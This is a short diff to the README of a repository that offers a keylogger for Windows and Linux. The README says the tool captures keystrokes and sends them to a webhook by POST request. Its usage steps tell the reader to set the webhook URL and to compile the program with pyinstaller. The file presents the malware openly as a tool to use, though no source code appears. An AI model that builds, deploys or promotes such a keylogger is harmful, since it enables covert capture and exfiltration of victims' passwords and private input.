mishalshanavas/keylogger_win_and-_linux/README.md

 # working

 this is a simple keylogger that works both on linux and windows it capures keystroks and send it via post requests
-#
+# useage
- change the webhookurl before use compile the file with 'pyinstaller' for your desired os for better results (optional)
+ change the webhookurl before use(important)

+ compile the file with 'pyinstaller' for your desired os for better results (optional)